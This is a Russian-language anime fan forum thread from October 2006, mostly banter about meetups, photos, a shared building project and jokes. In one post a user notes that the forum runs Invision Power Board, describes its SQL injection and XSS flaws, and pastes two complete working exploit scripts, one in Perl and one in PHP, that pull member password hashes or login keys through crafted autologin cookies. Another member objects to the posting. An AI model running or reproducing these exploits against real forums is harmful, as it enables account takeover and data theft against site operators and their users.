Butch Опубликовано 16 октября, 2006 Жалоба Опубликовано 16 октября, 2006 он зараза ночью храпитДа.. на страницах форума чего про себя тока не найдешь....Эм... хм... Ну и мы будем! Соберем всех, кого можно и пойдем гулять!А на выходных народу то больше буит... ))) и зачетнее....как попасть в команду(ну например) винипухоненавистников?НУ там на форуме есть отдельная тема про тимы.. там то и можно вступить.. или даже содать свою тиму... хы хы Цитата
Maltis Опубликовано 16 октября, 2006 Жалоба Опубликовано 16 октября, 2006 asket mixaa а эт к чему??? Офтоп батенька, офтоп!AlfizikМля почему - Fatal error: Call to undefined function: showform() in /vhosts/animeforum.ru/htdocs/sources/reputation.php on line 643 У меня тоже, я так, думаю, кавайность отменили^_^Kenhin а я те что говорил??? Чуть что сразу...все бяки;) Maltis а ты фотки будиш вылажавать!!!!! че их вылаживать? И так лажовые вышли... Ну раз ты просишь...На тебе парочку, для затравки. ^_^ Описание фоток:Наока и Нэка младшая:)Те же (какое Юри? Просто встретились два одиночества...):)AND думу думает.Васаби и Alfizik (жаль нижняя часть не получилась... самый пикантный момент) :)Кеншин и Миха. И пара кошек для Нэки-Аракавы, мяф... Цитата
Alfizik Опубликовано 16 октября, 2006 Жалоба Опубликовано 16 октября, 2006 (изменено) Maltis/А че у тя все фотографии называются хрен# (где # - номер хрена)??? :D Karantir/Где-то чет видел, но уже забыл... Поисчу, если сильно надо!1511493[/snapback] Та надо! Аригато что откликнулся. Изменено 16 октября, 2006 пользователем Alfizik (смотреть историю редактирования) Цитата
And Опубликовано 16 октября, 2006 Жалоба Опубликовано 16 октября, 2006 [Продираясь сквозь дебри нехилого похмелья...]for Акира Деймос[Поклон] Какие люди... Я так рад, что на меня до сих пор держат злость. Это приятно ^__^... for MaltisКак вчера добрался ^__^? Дописал???Мда... Заметь... Количество Деймосов медленно но неуклонно растет... Ну, как говорится, да прибудет с ними ФОБОС ^__^! for AlfizikЭто у Мальтийца менталитет такой ^__^! for ButchУспехов... [уполз поправлять пошатнувшееся здоровье] Цитата
Акира Деймос Опубликовано 16 октября, 2006 Жалоба Опубликовано 16 октября, 2006 НУ там на форуме есть отдельная тема про тимы.. там то и можно вступить.. или даже содать свою тиму... хы хы1511695[/snapback]Хде? дай ссылочку пжалста Цитата
Акира Деймос Опубликовано 16 октября, 2006 Жалоба Опубликовано 16 октября, 2006 Количество Деймосов медленно но неуклонно растет1512153[/snapback]ниче не знаю я Деймос с 2002 года. Цитата
Karantir Опубликовано 16 октября, 2006 Жалоба Опубликовано 16 октября, 2006 Акира ДеймосХде? дай ссылочку пжалстаhttps://www.animeforum.ru/index.php?showtopic=38388&st=0 MaltisФотки аццкие просто! ^__^Особенно Оля на первой!! ГЫ-ГЫ Цитата
Акира Деймос Опубликовано 16 октября, 2006 Жалоба Опубликовано 16 октября, 2006 Karantir ах, все это так сло-о-о-о-ожно. Цитата
Maltis Опубликовано 16 октября, 2006 Жалоба Опубликовано 16 октября, 2006 (изменено) Акира Деймос ниче не знаю я Деймос с 2002 года. Девочка... У нас есть перс который Деймос с 1991г. Кстати надо вас познакомить... хехе :) AND Как вчера добрался ^__^? Дописал??? Пришел домой трезвый, мокрый и злой. Пол ночи работал. Кое-что дописал... Мда... Заметь... Количество Деймосов медленно но неуклонно растет... Ну, как говорится, да прибудет с ними ФОБОС ^__^! Я надеюсь ОН тут ни при чем???for AlfizikЭто у Мальтийца менталитет такой ^__^! Аага, учусь, и стараюсь стырить лавры опытного хентайщика:) Так все время отбирают... Karantir убедительная просьба изъяснятся на диалекте, принятом в этой части земного шара. Моя тупая Орка твоя не понимать. Изменено 16 октября, 2006 пользователем Maltis (смотреть историю редактирования) Цитата
Karantir Опубликовано 16 октября, 2006 Жалоба Опубликовано 16 октября, 2006 Акира ДеймосЧе сложного-то? Пишешь одно личное сообщение и всё! AlfizikНадыбал я тебе архивчик один! Все красиво и понятно! Даже с картинками! Цитата
Акира Деймос Опубликовано 16 октября, 2006 Жалоба Опубликовано 16 октября, 2006 У нас есть перс который Деймос с 1991г.1512463[/snapback] Родичи видать.... Добавлено:Karantir какую тиму выбрать? вот была бы тима анонимных Симообожателей или сообщество правильной ориентации Цитата
Прик Опубликовано 16 октября, 2006 Жалоба Опубликовано 16 октября, 2006 (изменено) *ghost of bear* Хочеться ещё раз поднять два вполне насущных вопроса. 1 Просто нереальное количество флуда на форуме.Огромное колличество бессмысленных постов, порой форум больше напоминает аську.Товарищи пишите более осмысленные вещи, и не забывайте про наличие лички.2 Недружность аниме-сообщества Симферополя.Эта тема поднималась несколько раз. Когда - мирно, когда выливалась в т.н. конфронтацию. Но тем не менее проблемма есть в налиичии, и не исключено, что её нужно решать. Как показали наблюдения, людей разьеденяет не любовь или отсутствие ононй к пиву и аниме, а разное мироощущение и миропонимание. оффтоп(начало оффтопа[ Теперь о веселом. Пополнил свою коллекцию, теперь в ней есть и китайский, его собственно и выкладываю. Однажды, юноша по имени Ван всем сердцем полюбил красавицу Ци. Долго и безуспешно добивался юноша благосклонности гордой девушки. И вот, однажды, блуждая в горах в поисках диких трав, Ван увидел, как на лесной поляне горько плачет прекрасная пастушка. - О чем ты плачешь, красавица ? - спросил Ван - Мой любимый бросил меня, предпочтя жизнь в Шаолине, - не переставая плакать, ответила девушка. - А еще... А еще я потеряла мою любимую овечку. -Могу ли я чем-нибудь помочь тебе ? - подошел поближе Ван Девушка, оценивающе взглянув на Вана, и чуть покраснев, сказала: - О, да, если ты позволишь мне впустить твой нефритовый стебель в мои яшмовые врата. - С радостью ! - согласился Ван. Вот уже полгода он скитался в горах в поисках особо редкого корня Ибу, придающего силу в любовных утехах. Быстро скинув с себя одежду, парочка приступила к любовным игрищам в соответствии с древним учением Ко И Ту. Но как только они решили попробовать особо изысканную позицию "Крестьянин катит тачку с горы Уй", как вдруг в зарослях бамбука раздалось шуршание и сопение. На поляну выскочила огромная панда, и, раскинув в стороны лапы, проревела "НЕХАО!!!" 2 КарантирНашёл в нете один рассказ. Посвящается тебе. Думаю юмор оценишь. Подлец - Девушка, а что вы делаете сегодня вечером? - Тээкс, дайте подумать.. А вечер – это со скольки? - Нуу. Скажем с семи вечера. - Вечер застанет меня в общественном транспорте. Там я буду стоять и неприязненно смотреть на попутчиков. Не потому, что я мизантроп, а потому что я устала после работы, а они все тут толкаются и толпятся и ни одна сволочь места не уступит. Потом я доеду до дома, там посижу минут 10 и убегу на кухню готовить ужин. Ужин съем молча, отвлекаясь на телевизор. Потом не буду отвлекаться от телевизора. А там, между прочим, фигню показывают, а мне читать нечего. А книжку надо бы купить, но вот все некогда как-то. Потому буду смотреть в телевизор. Потом решу, что посуду мне мыть лень и кину ее в раковину до утра. Дескать, утром помою. Обман! Совру сама себе. Не вымою я ее и утром. Потому что проснусь поздно, да и лень будет. Вооот. Потом приму душ, лягу в постель и буду долго ворочаться на месте, думать о том, как плохо жить одной, ругать про себя соседей, которые шумят и мешают спать. Потом засну. Вот в принципе и все, что я делаю сегодня вечером. - Хаааа!! А я вот сегодня вечером иду сначала поужинать в одно приличное место, где хорошо готовят. Туда меня пригласили друзья. Они, кстати , платят, что очень приятно. Потом мы идем в один клуб, где удобные диваны, ну вы наверняка слышали о нем - он сейчас самый модный в городе. Там мы будем сидеть на диване, слушать джаз и пить вино. Потом, наверное уедем поиграть на бильярде. Потом, наверное разъедемся по домам. Дома я приму душ и лягу спать. - Один? - Почему один-то? Я с девушкой своей живу. Люблю ее безумно. Она просто не может сегодня с нами пойти. - Таакс. Она не может пойти с вами, и вы приглашаете меня? И вы говорите, что любите ее?! - Вы что-то путаете. Никуда я вас никуда не приглашаю. - Как.. а ресторан, джаз, бильярд? - Я туда иду. Я! Вы причем? Вы домой идете. Телевизор смотреть. Мы просто с вами рассказали друг другу о планах на вечер. Просто поговорили. Правда здорово?- Какой же вы подлец! Просто подлец! - Какая же вы неадекватная! Прощайте! Вечером он в семейных трусах жевал на кухне макароны , отвлекаясь изредка на телевизор. Вспоминал как же здорово он поприкалывался над незнакомой девушкой и думал о том, что жить одному - как-то спокойнее. А она в лучшем своем платье попивала вино в модном клубе, слушала джаз и шептала:- Ну и где этот подлец? Я хочу посмотреть на его лицо, а его нет. Дважды подлец! Такой вечер испортил! ]конец оффтопа) Изменено 16 октября, 2006 пользователем pricolist (смотреть историю редактирования) Цитата
Maltis Опубликовано 16 октября, 2006 Жалоба Опубликовано 16 октября, 2006 На-до-ел-о. Ушел в монастырь. Цитата
Прик Опубликовано 16 октября, 2006 Жалоба Опубликовано 16 октября, 2006 Женский? Уточняй что надоело. Цитата
Нэка-младшая Опубликовано 16 октября, 2006 Жалоба Опубликовано 16 октября, 2006 СЕГОДНЯ??? А Няка не в курсе событий (((( Цитата
Voivode Опубликовано 16 октября, 2006 Жалоба Опубликовано 16 октября, 2006 (изменено) Килокалл, мля! Ты когда мне демоновскую дискретку притащишь?Если не притащишь, то мы обмажешем свои морды черным-черным гуталином, а твою задницу прозрачным вазилином. И тебе будет больно и обидно. P.S. И нехер свою трубу вырубать когда я тебе звоню Изменено 16 октября, 2006 пользователем Voivode (смотреть историю редактирования) Цитата
Прик Опубликовано 16 октября, 2006 Жалоба Опубликовано 16 октября, 2006 (изменено) Если есть желание поговарить выходи в аську.И не надо мне мозг разрушать по поводу того что вы себе и чем мазать будете. Мобилу я не отключаю. А ты сам кстати умный, мог бы и сам сделать уже. Изменено 16 октября, 2006 пользователем pricolist (смотреть историю редактирования) Цитата
Alfizik Опубликовано 16 октября, 2006 Жалоба Опубликовано 16 октября, 2006 (изменено) О 108 страница, опять я впереди планеты всей! :) pricolist/Да мозг тебе разрушили не по детски? <_< Давай ближе к телу, что конкретно надо делать чтоб искоренить пункт 2, я лично предлагаю трудотерапию в Аниме-домике (вам батенька причем интенсивный курс, а то у вас мозг разрушается... :lol: ) На-до-ел-о. Ушел в монастырь.1512833[/snapback] Не надо! Там не держат всяких Инь!!! Karantir/Все красиво и понятно! Даже с картинками!1512504[/snapback] ГЫ надеюсь не комиксы? :D Кода можно будет взять этот архивчик? Изменено 16 октября, 2006 пользователем Alfizik (смотреть историю редактирования) Цитата
Прик Опубликовано 16 октября, 2006 Жалоба Опубликовано 16 октября, 2006 Я уже говаривал что у мя просто нет времени на стройку, объяснял не раз. Цитата
Javer Опубликовано 17 октября, 2006 Жалоба Опубликовано 17 октября, 2006 Я уже говаривал что у мя просто нет времени на стройку, объяснял не раз.1513208[/snapback]))) Олек, у тя времени нет ? ))) на стройку ??? ... неужели ты не можешь забить на работу, покончить с программерской жизнью, забыть о своей семье, о личной жизни ? .. но ведь ты преобретешь "лучшее" .. ты станешь одним из онимешнигов.. и будешь говорить об аниме ;) А терь к делу. В связи с тем, что я поступить как еврей не могу.. то решил кое что подчеркнуть. Опустите свои глазки на конец страницы и посмотрите что там написано... те кто ничего не увидел - ЛБУ.. ничего не поделаешь.. диагноз практически не излечим (возможно только теоретическое лечение).. а те, кто увидел "Powered by Invision Power Board(Trial) " - они все таки видят .. и значит, умеют соображать... Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения. SQL-инъекция существует из-за недостаточной обработки данных в сценарии 'sources/login.php'. Удаленный пользователь может с помощью специально сформированного файла куки выполнить произвольные SQL команды в базе данных приложения при выключенных Magic_quotes_gpc в конфигурационном файле php. Отсутствует проверка входных данных при отображении результатов поиска в параметре 'highlite' сценария 'sources/topics.php'. Удаленный пользователь может с помощью специально сформированного файла куки выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. в зависимости от того, на чем вы захотите написать сплоит, пишу два сорца: \\_________________________________//#!/usr/bin/perl ## Invision Power Board SQL injection exploit by RST/GHC## vulnerable forum versions : 1.* , 2.* (<2.0.4)## tested on version 1.3 Final and version 2.0.2 ## * work on all mysql versions## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)## ©oded by 1dt.w0lf## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~## screen:## ~~~~~~~## r57ipb2.pl blah.com /ipb13/ 1 0## [~] SERVER : blah.com ## [~] PATH : /ipb13/## [~] MEMBER ID : 1## [~] TARGET : 0 - IPB 1.*## [~] SEARCHING PASSWORD ... [ DONE ]#### MEMBER ID : 1## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99#### r57ipb2.pl blah.com /ipb202/ 1 1## [~] SERVER : blah.com ## [~] PATH : /ipb202/## [~] MEMBER ID : 1## [~] TARGET : 1 - IPB 2.*## [~] SEARCHING PASSWORD ... [ DONE ]#### MEMBER ID : 1## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~## Greets: James Bercegay of the GulfTech Security Research Team ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ use IO::Socket; if (@ARGV < 4) { &usage; } $server = $ARGV[0];$path = $ARGV[1];$member_id = $ARGV[2];$target = $ARGV[3]; $pass = ($target)?('member_login_key'):('password'); $server =~ s!(http:\/\/)!!; $request = 'http://';$request .= $server;$request .= $path; $s_num = 1;$|++;$n = 0; print "[~] SERVER : $server\r\n";print "[~] PATH : $path\r\n";print "[~] MEMBER ID : $member_id\r\n";print "[~] TARGET : $target";print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));print "\r\n";print "[~] SEARCHING PASSWORD ... [|]"; ($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; while(1){if(&found(47,58)==0) { &found(96,122); } $char = $i;if ($char=="0") { if(length($allchar) > 0){ print qq{\b\b DONE ] MEMBER ID : $member_id }; print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : ')); print $allchar."\r\n"; } else { print "\b\b FAILED ]"; } exit(); }else { $allchar .= chr(42); }$s_num++;} sub found($$) { my $fmin = $_[0]; my $fmax = $_[1]; if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; } $r = int($fmax - ($fmax-$fmin)/2); $check = " BETWEEN $r AND $fmax"; if ( &check($check) ) { &found($r,$fmax); } else { &found($fmin,$r); } } sub crack($$) { my $cmin = $_[0]; my $cmax = $_[1]; $i = $cmin; while ($i<$cmax) { $crcheck = "=$i"; if ( &check($crcheck) ) { return $i; } $i++; } $i = 0; return $i; } sub check($) { $n++; status(); $ccheck = $_[0]; $pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D"; $pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28"; $pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*"; $pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; $nmalykh = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%21%20"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80"); printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n", $path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh); while(<$socket>) { if (/Set-Cookie: session_id=0;/) { return 1; } } return 0; } sub status(){ $status = $n % 5; if($status==0){ print "\b\b/]"; } if($status==1){ print "\b\b-]"; } if($status==2){ print "\b\b\\]"; } if($status==3){ print "\b\b|]"; }} sub usage() { print q( Invision Power Board v < 2.0.4 SQL injection exploit ---------------------------------------------------- USAGE: ~~~~~~ r57ipb2.pl [server] [/folder/] [member_id] [target] [server] - host where IPB installed [/folder/] - folder where IPB installed [member_id] - user id for brute targets: 0 - IPB 1.* 1 - IPB 2.* (Prior To 2.0.4) e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1 ---------------------------------------------------- ©oded by 1dt.w0lf RST/GHC , http://rst.void.ru , http://ghc.ru ); exit(); } \\__________________________//<?php /* <= 2.0.3 <= 1.3.1 Final /str0ke */ $server = "SERVER"; $port = 80; $file = "PATH"; $target = 81; /* User id and password used to fake-logon are not important. '10' is a random number. */ $id = 10; $pass = ""; $hex = "0123456789abcdef"; for($i = 1; $i <= 32; $i++ ) { $idx = 0; $found = false; while( !($found) ) { $letter = substr($hex, $idx, 1); /* %2527 translates to %27, which gets past magic quotes. This is translated to ' by urldecode. */ $cookie = "member_id=$id;pass_hash=$pass%2527%20OR%20id=$target"; $cookie .= "%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527" . $letter; /* Query is in effect: SELECT * FROM an_members WHERE id=$id AND password='$pass' OR id=$target HAVING id=$target AND MID(`password`,$i,1)='$letter' */ $header = getHeader($server, $port, $file . "index.php?act=Login&CODE=autologin", $cookie); if( !preg_match('/Location:(.*)act\=Login\&CODE\=00\r\n/', $header) ) { echo $i . ": " . $letter . "\n"; $found = true; $hash .= $letter; } else { $idx++; } } } echo "\n\nFinal Hash: $hash\n"; function getHeader($server, $port, $file, $cookie) { $ip = gethostbyname($server); $fp = fsockopen($ip, $port); if (!$fp) { return "Unknown"; } else { $com = "HEAD $file HTTP/1.1\r\n"; $com .= "Host: $server:$port\r\n"; $com .= "Cookie: $cookie\r\n"; $com .= "Connection: close\r\n"; $com .= "\r\n"; fputs($fp, $com); do { $header.= fread($fp, 512); } while( !preg_match('/\r\n\r\n$/',$header) ); } return $header; } ?> + Уязвимость заключается в возможности присоединять HTML и TXT файлы к соообщениям форума, которые содержат скрипты JavaScript. При открытии таких файлов в браузере, на компьютере пользователя происходит отображение страницы и соответственно выполнение скриптов JavaScript. (жава, моя любимая) на данную тему есть много статей.. ибо писали грамотные :huh: Цитата
Maltis Опубликовано 17 октября, 2006 Жалоба Опубликовано 17 октября, 2006 *примеряя рясу* Обалдеть! Если раньше мы просто афтопили, теперь листинги программ выкладываем. А главное непонятно к чему бы это?... Javer уважаемый куда это? Поясните простому обывателю? Alfizik отстань от pricolistа, ему трудотерапия противопоказана! Человек занят, понимаешь, занят!!!Ферштейн? Кстати в следующую суботу меня не будет. Мои разлюбезные родители вспомнили, что у них есть незабвенное дитя и решили его выгулять. Причем тотально^_^ Цитата
Наока Опубликовано 17 октября, 2006 Жалоба Опубликовано 17 октября, 2006 :huh: Сколько флуда.....................................Да уж похоже это штука заразная и неизлечимая..............ВСЕМ С КЕМ Я ПОЗНАКОМИЛАСЬ БОЛЬШОЙ ПРИВЕТИК!ОЧЕНЬ ПРИЯТНО!И ЕЩЕ ПОЗДРАВЬТЕ МЯ Я ИДУ НА КУРСЫ ЯПОНСКОГО! Цитата
Alfizik Опубликовано 17 октября, 2006 Жалоба Опубликовано 17 октября, 2006 ))) Олек, у тя времени нет ? ))) на стройку ??? ... неужели ты не можешь забить на работу, покончить с программерской жизнью, забыть о своей семье, о личной жизни ? .. но ведь ты преобретешь "лучшее" .. ты станешь одним из онимешнигов.. и будешь говорить об аниме1513539[/snapback] Мля я наверное невероятно работоспособный и выносливый или по крайней мере Гай Юлий Цезарь (могу делать несколько дел одновремено :) ). А то страно это как то потому как я успеваю работать на стройке, работать у себя на фазенде, юзать комп (по делу, а также и без дела), появляться в семье, заниматься личной жизнью, + обчаться с на Анимешниками, + гудеть с друзьями, + (о боже мой и как я все это успеваю) смотреть Аниме!!! Да и неповерите работаем мы в Аниме-домике, после основной работы вечером и по ночам, а утречком прекрасно и бодренько идем на работу/учебу или еще куда там..., и кста в принципе неплохо справляемся сами, ГЫ. Наока/ И ЕЩЕ ПОЗДРАВЬТЕ МЯ Я ИДУ НА КУРСЫ ЯПОНСКОГО!1513768[/snapback] Вау! А куда? В "Лингвист"? И скока это счастье стоит? Цитата
Прик Опубликовано 17 октября, 2006 Жалоба Опубликовано 17 октября, 2006 2 Alfizik Увы я не такой выносливый(выше Александра Македонского не поднимусь). Мне на всё времени не хватает. Тем паче что мы уже это обсуждали в реале и зачем выносить это на обсуждение на форуме - не понимаю. Ещё не понимаю чем мой приезд на стройку изменит общую структуру аниме-сообщества. Объясни. 2 Maltis Ирония в данном случае не так уместна как кажется. Ты тоже как видно свободен не постоянно, так что не надо сарказмировать. 2 Javer Ты как я понял являешься полиморфным эльфом с острова Ява?Лучше объясни зачем ты людям експлойты дал, да ещё не объяснил как ими пользоваться. Они ж всё поламают напрочь. Будут бяки всякие писать. Цитата
Alfizik Опубликовано 17 октября, 2006 Жалоба Опубликовано 17 октября, 2006 (изменено) pricolist/Ещё не понимаю чем мой приезд на стройку изменит общую структуру аниме-сообщества. Объясни.1513871[/snapback] Да успокойся, тебя на стройку ни кто не зовет и не приглашает. Может закроем тему! А то это нытье на протяжении ээ-э помому около 10 стр., "а зачем все это надо? А кровать там будет? А вы мля СЕБЕ строите! А я не могу. А я не хочу, а раз вы строите то вы "демоны" позорные!!! А что это изменит?" уже надоело... Тем более кто хочет, сам приходит на стройку, без приглашения или сам спрашивает когда прийти. И мы прекрасно и плодотворно работаем. Изменено 17 октября, 2006 пользователем Alfizik (смотреть историю редактирования) Цитата
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.